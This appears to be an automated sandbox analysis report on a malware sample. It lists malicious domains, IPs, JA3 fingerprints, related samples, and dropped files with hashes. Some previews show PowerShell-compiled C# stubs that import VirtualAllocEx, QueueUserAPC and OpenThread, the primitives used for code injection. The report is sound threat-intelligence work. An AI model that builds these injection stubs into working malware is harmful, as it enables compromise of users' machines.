new-fp-shed.wg1.b.yahoo.com	anIV2qJeLD.exe	Get hash	malicious	Browse	87.248.100.216
	0MGLPJiSa5.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.215
	Fuutbqvhmc.dll	Get hash	malicious	Browse	87.248.100.215
	Antic Cracked.exe	Get hash	malicious	Browse	87.248.100.215
	nesfooF2Q1.exe	Get hash	malicious	Browse	87.248.100.215
	X4V4jFmFhO.dll	Get hash	malicious	Browse	87.248.100.216
	GLpkbbRAp2.dll	Get hash	malicious	Browse	87.248.100.216
	youNextNext.dll	Get hash	malicious	Browse	87.248.100.215
	bebys10.dll	Get hash	malicious	Browse	87.248.100.215
	bebys12.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq8.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq1.dll	Get hash	malicious	Browse	87.248.100.216
	nextNextLike.dll	Get hash	malicious	Browse	87.248.100.215
	TFIw2EIiZh.exe	Get hash	malicious	Browse	87.248.100.215
	Solicitor Inquiry No. 001_4921 - UK.xls	Get hash	malicious	Browse	87.248.100.215
	kANwTlkiJp.dll	Get hash	malicious	Browse	87.248.100.215
	gVuD2n1r5v.dll	Get hash	malicious	Browse	87.248.100.215
	304945441205_035156257_20211104.xls	Get hash	malicious	Browse	87.248.100.215
myip.opendns.com	anIV2qJeLD.exe	Get hash	malicious	Browse	84.17.52.63
	gECym.dll	Get hash	malicious	Browse	102.129.143.33
	data.dll	Get hash	malicious	Browse	102.129.143.57
	test1.dll	Get hash	malicious	Browse	102.129.143.57
	test1.dll	Get hash	malicious	Browse	185.32.222.18
	97Ys56eAFo.dll	Get hash	malicious	Browse	84.17.52.9
	new_working_conditions[2021.09.23_12-51].xlsb	Get hash	malicious	Browse	84.17.52.9
	OcEyzBswGm.exe	Get hash	malicious	Browse	84.17.52.41
	Invoice778465.xlsb	Get hash	malicious	Browse	185.189.150.74
	o0AX0nKiUn.dll	Get hash	malicious	Browse	84.17.52.3
	document-1774544026.xls	Get hash	malicious	Browse	84.17.52.79
	316.xlsm	Get hash	malicious	Browse	84.17.52.79
	moan.dll	Get hash	malicious	Browse	84.17.52.79
	document-5505542.xlsm	Get hash	malicious	Browse	84.17.52.79
	document-1223674862.xlsm	Get hash	malicious	Browse	84.17.52.79
	e6.exe	Get hash	malicious	Browse	84.17.52.78
	j81SoD9q5b.xls	Get hash	malicious	Browse	84.17.52.78
	xls.xls	Get hash	malicious	Browse	84.17.52.38
	0xyZ4rY0opA2.vbs	Get hash	malicious	Browse	84.17.52.25
	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	84.17.52.25

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
M247GB	anIV2qJeLD.exe	Get hash	malicious	Browse	89.44.9.140
	sbcPMw271m	Get hash	malicious	Browse	38.201.44.7
	MLEdqapxkp	Get hash	malicious	Browse	45.86.28.44
	from-isoDOCUMENT.EXE1.exe	Get hash	malicious	Browse	152.89.162.59
	DAImS4qg20.dll	Get hash	malicious	Browse	37.120.206.119
	tebdXHvUhB.dll	Get hash	malicious	Browse	37.120.206.119
	KKveTTgaAAsecNNaaaa.x86-20211122-0650	Get hash	malicious	Browse	192.253.247.181
	DOCUMENT.EXE	Get hash	malicious	Browse	152.89.162.59
	E4lCZiGLyr	Get hash	malicious	Browse	38.202.225.99
	Scan_Nov_Payment Advice,PDF.exe	Get hash	malicious	Browse	185.200.116.203
	TFKjmnMrPM.exe	Get hash	malicious	Browse	217.138.212.58
	MrBfVHgunq.exe	Get hash	malicious	Browse	217.138.212.58
	l2QQobwA6w.apk	Get hash	malicious	Browse	185.158.250.193
	riJ6zzi6fc	Get hash	malicious	Browse	206.127.222.213
	KXUcatZZiH	Get hash	malicious	Browse	158.46.140.134
	Linux_amd64	Get hash	malicious	Browse	45.89.175.119
	NmYDz4fPbW	Get hash	malicious	Browse	38.201.44.9
	T8H5LF8GlO	Get hash	malicious	Browse	185.90.60.84
	Novemeber Payment Advice 20211197864,PDF.exe	Get hash	malicious	Browse	185.200.116.203
	yakuza.arm7	Get hash	malicious	Browse	31.12.78.158
YAHOO-3US	0MGLPJiSa5.dll	Get hash	malicious	Browse	74.6.143.25
	Fuutbqvhmc.dll	Get hash	malicious	Browse	74.6.143.26
	T8H5LF8GlO	Get hash	malicious	Browse	98.139.166.49
	TFEkbH3ag3	Get hash	malicious	Browse	98.139.166.22
	X4V4jFmFhO.dll	Get hash	malicious	Browse	74.6.143.26
	jew.x86	Get hash	malicious	Browse	98.139.166.15
	bebys10.dll	Get hash	malicious	Browse	74.6.143.26
	zD1jpTbFQq	Get hash	malicious	Browse	98.139.130.39
	zuroq8.dll	Get hash	malicious	Browse	74.6.143.25
	zuroq1.dll	Get hash	malicious	Browse	74.6.143.25
	52k0qe3yt3.dll	Get hash	malicious	Browse	74.6.143.25
	SayEjNMwtQ.dll	Get hash	malicious	Browse	74.6.143.25
	uj8A47Ew7u.dll	Get hash	malicious	Browse	74.6.143.25
	b3astmode.arm	Get hash	malicious	Browse	98.139.142.39
	WGEcMZQA.dll	Get hash	malicious	Browse	74.6.143.26
	mzfAM4jLfv.dll	Get hash	malicious	Browse	74.6.143.25
	vdbb9MZTVz.dll	Get hash	malicious	Browse	74.6.143.26
	Update-KB250-x86.exe	Get hash	malicious	Browse	67.195.204.72
	Update-KB2984-x86.exe	Get hash	malicious	Browse	67.195.204.74
	Voya6XBdBT	Get hash	malicious	Browse	72.30.110.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
57f3642b4e37e28f5cbe3020c9331b4c	anIV2qJeLD.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	Screenshot00112021.scr.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	1B2C4ED9193792BFE48A5722705085E2AFA7C14FD1951.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	LOfYSALEZr.dll	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	kgJewvQClx.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	heUtkmY9lS.dll	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	dxcbs4GN4T.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	xQDLIutCAU.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	HBHNYsrx3p.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	ftCytTSz94.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	BRHhSOSJ8B.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	iWLjWhsT55.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	Payment.html	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	sample3.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	8xiF0lExRy.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	Documento--SII--33875.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	OnZH4ftMLU.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	yytr.dll	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	vG4U0RKFY2.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
37f463bf4616ecd445d4a1937da06e19	FhP4JYCU7J.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	ugeLMlEROB.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	NtqHVU6GDV.dll	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	anIV2qJeLD.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	FhP4JYCU7J.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	NtqHVU6GDV.dll	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	Hfecs.combGNAaGZlY3MuY29t.htm	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	XP-SN-3765518.htm	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	inf.brxd.BXNUYZTCHJ.msi	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	SWIFT-MT-103.docx	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	RFQ.dll	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	NfnCgyhuhS.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	WQRrng5aiw.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	Omegabuilders-FAX84216.html	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	WQRrng5aiw.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	#U266b_789_89676.htm	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	Doc0011222003.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	ATT94606.htm	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	Remittance Advice.html	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216
	e8rimWGicH.exe	Get hash	malicious	Browse	89.44.9.140 74.6.143.26 87.248.100.216

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\2227.bi1 Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	117
Entropy (8bit):	4.51228797597229
Encrypted:	false
SSDEEP:	3:cPaRhARtt7TSjjhThARtnJI1/v:oMWbtChWbng/v
MD5:	A45E1F430E5F27F3800271EA643136A0
SHA1:	26F5310FA0B49B1568413BC590BE8B974EC12987
SHA-256:	E459FD7C19DE215CD06D71D6D4449C402DC4058A3A7FCF752B77C291655CC8F9
SHA-512:	BA6B86ED4B359E4EF3412E00DB274201D93F5B22B91AD02DFE0894D0C2CAD15032F8F92630DD20A4E0C995E9C87E79555FD0F9CD56722220F56A336946F2CEC2
Malicious:	false
Preview:	Server: dns.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 84.17.52.63....-------- ..

C:\Users\user\AppData\Local\Temp\4v5gswf4.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	426
Entropy (8bit):	5.033139906052158
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ3eIVMRSRa+eNMjSSRrtXuSRHq1zyaRMseeBVtEvwy:V/DTLDfuRXl9eg5rtVuzyleBKwy
MD5:	4D67B4EE9B0124EA3067CCCC7F44B80F
SHA1:	2FE1AFC564476F305A0E2D3F57FC067E3C08E594
SHA-256:	5F263A0DD8E22A4DE11BC5870D10AE9B8D6DFD3CF5CBE915ACE34F747E88C225
SHA-512:	6CA77C9F0D56A036715ABD769E54236F66E7F8FE25CA1B3979DA81976E25AE7B655781A4D141B5C87CFBD5195BB2DC71D1B9D15B875C244FE8EEBDA72624E137
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class fvjclmvowuq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylhvvsufcha,uint rxyvxpo);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr jhx,IntPtr fapfrwulaod,uint ucg,uint nhatlxexrfg,uint mbnnbncpkga);.. }..}.

C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.278318349630682
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f4zxs7+AEszIWXp+N23fzGAn:p37Lvkmb6KHwWZE8CA
MD5:	BC70783C96A238BA655593E342B9F14F
SHA1:	602976D538640F98BB934A2B550CF0DDAC4F3EE6
SHA-256:	F31431C2E7BE9D780B3900A2CE17023A085F065523BC91FDCAA072FD00ECCFE2
SHA-512:	67D9A608A4757C15C791F0CC670883EE8067ABD2C27592D1AFBE6D1CD989250EF790C1C6147E0CC02428FC9B19B0BA1BFF19353557D81C12E998D12D4A75A1A6
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4v5gswf4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4v5gswf4.0.cs"

C:\Users\user\AppData\Local\Temp\4v5gswf4.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.661168047511821
Encrypted:	false
SSDEEP:	24:etGSZcM2Wreq8MTBo6EyX4oonTj9dWhdmWdFtkZfUjFKWI+ycuZhNCSQakSNSVPE:6ZeYSMTBdlX4t3DWjwJU5J1ulya32q
MD5:	8387E1189611349B98D2098FEDA7DC3D
SHA1:	7365B4E64653E9724279EEA92583E7BE694146A4
SHA-256:	62E4730FD807446620449BC72646B39A7088698061347635439780BEF69AA8D1
SHA-512:	2AB585C161C0B4F9E2211657D051A44344C4E3C8218F20FE9DD37E5C3B50B254210AC9D39BA25CF02D3F178BFA7C7A024537C4052722B731B3D1141FF1D9F24A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..x.............................................................(....*BSJB............v4.0.30319......l...P...#~......P...#Strings............#US.........#GUID...$...T...#Blob...........G.........%3............................................................7.0...............3.......................#.............. >............ P............ X.....P ......g.........m.....y.................................g.!...g...!.g.&...g.......+.....4.F.....>.......P.......X.....

C:\Users\user\AppData\Local\Temp\4v5gswf4.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.328401971088736
Encrypted:	false
SSDEEP:	12:xKIR37Lvkmb6KHwWZE8C1KaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHxE8oKaM5DqBVKVrdFAMBJTH
MD5:	DE60CB4B973C89DB1CA831AEFC5FE7CF
SHA1:	F074C4EB01E5B627227C597C9D2354EF725EC570
SHA-256:	1B75158B8528BAD371568EE85107A3D36EEA2B51074E82E2CC9A5FDBA924A403
SHA-512:	D33AF0CC88E8351AF4FDC8D022ACB878244B5DCA28B2ADAAB58BD85BF61E4B6C232170DA88EF16515FB8753A8D53816679C8A9603B39C9ACFF6350076A9B99FF
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4v5gswf4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4v5gswf4.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.10949149293103
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykSQak7YnqqNSVPN5Dlq5J:+RI+ycuZhNCSQakSNSVPNnqX
MD5:	863D455CD0D191F459760CC4DCE4E8BB
SHA1:	8229FC84BDD205FC3A9985DB1E70040896EAF3CE
SHA-256:	51F8B62C4B786370CF4E71F5CECD8679E5DA2D13D9C773789FD30076A69AEC79
SHA-512:	8B62D25E18D58816381AFA04BF7F6EAD04E948F8E813AF977FD9A4C38D1243174314D4B35F1B70E5010046E0B7138BF0C968BC6053E08BC94B7CA91452302392
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.v.5.g.s.w.f.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.v.5.g.s.w.f.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0738524384874757
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDak7YnqqvPN5Dlq5J:+RI+ycuZhNhakSvPNnqX
MD5:	C2D866EAB542DC2E96510D2B78B50BA0
SHA1:	11792FA8538C80AE0BDDE578E912F4B510D3929D
SHA-256:	9153ACB652C422ABA36046E6BD63C15ACE04D1D1AB1501AC376F991D833372D1
SHA-512:	9AF4D5FB82FA223EE3F0F4B19D4FD8D51C6FEC901C9E0017EE2ADEFE57E4E5F4B7CAF7D368F1FD86733344CF8851FC73B7DB8F90528B8294D55963F0C35A7B3D
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.1.a.a.e.k.l.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.1.a.a.e.k.l.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES2A77.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.9887400565326674
Encrypted:	false
SSDEEP:	24:HfnW9Q3q6hH2hKdNWI+ycuZhNCSQakSNSVPNnq9hgd:P53qeMKd41ulya32q9y
MD5:	ACC30F70E6A583DA1D499AA1E4E7122F
SHA1:	F2709DA4327CAB53FB1AB0DDC8D0A1FE4C1A9CB9
SHA-256:	7EFA06080F2E90DAF6224F2B08434BE97DF0BA4FDB6FAE3D8666D52A89DAABFD
SHA-512:	716635BAAC4E4313A6AEC9F39729C5766E0FE97FEB0A3E1CAB9E8EBE8DABC8D699AF6A7B2F2A0FA4EE29EA24F197057D418BB0E17E135B33FBBF57763457B45D
Malicious:	false
Preview:	L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........J....c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP..................=E\...Yv...............4.......C:\Users\user\AppData\Local\Temp\RES2A77.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.v.5.g.s.w.f.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RESDB8.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.97295814037481
Encrypted:	false
SSDEEP:	24:HqnW9rVfytHCWhKdNwI+ycuZhNhakSvPNnq9hgd:8WVfytbKdm1ulha3tq9y
MD5:	C9912D93B5802D8EADCF8D36D91A5E38
SHA1:	484FFFD89A10CB8DF08B97C54F4F1D28D5C79E9D
SHA-256:	5408AD27D80D801335AAA0E0477F42342DEB6264A5DB772C5F99253A3F37BE28
SHA-512:	B0519A087CE5E06BE3D3F950D14D3D02866E5850BC6160EC7CD79C56CD95BE6216524D9EBCC611DB404C413C1F617431BF3866F73C5BADDED1E350B226B2E15F
Malicious:	false
Preview:	L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP..................f.B...Q.+x.............3.......C:\Users\user\AppData\Local\Temp\RESDB8.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.1.a.a.e.k.l.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mmq3jzl.ebk.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3sr4b0q.5pk.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\i1aaekli.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	414
Entropy (8bit):	5.012387590489786
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJc0H/VMRSR7a1gPc9OopxkSRa+rVSSRnA/fFOlN218zPQy:V/DTLDfuPH/ly/xv9rV5nA/NwSQQy
MD5:	E458C9B10EE5485711E8601EC2A9F7E7
SHA1:	52EBD94DA80BD5538C113C1A73BA0F773B3207F4
SHA-256:	10D6C8D84A31080F063B2FF734D3EC20DA046B698298723676C722C80D932683
SHA-512:	98F83BF02C6E41CDB284BC764B9F31231BA7936A086679333D8AA8A459448BCAE8A77765E3709EBB493FF274BF55F01282FB0EDA20391FC943E4BC0F184CF0E9
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class cnjja. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ljgjre,IntPtr eayjlqvhl,IntPtr sykorjnxna);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint hrlef,uint rrugydrmoih,IntPtr lsfhdtddyu);.. }..}.

C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.230045602824142
Encrypted:	false
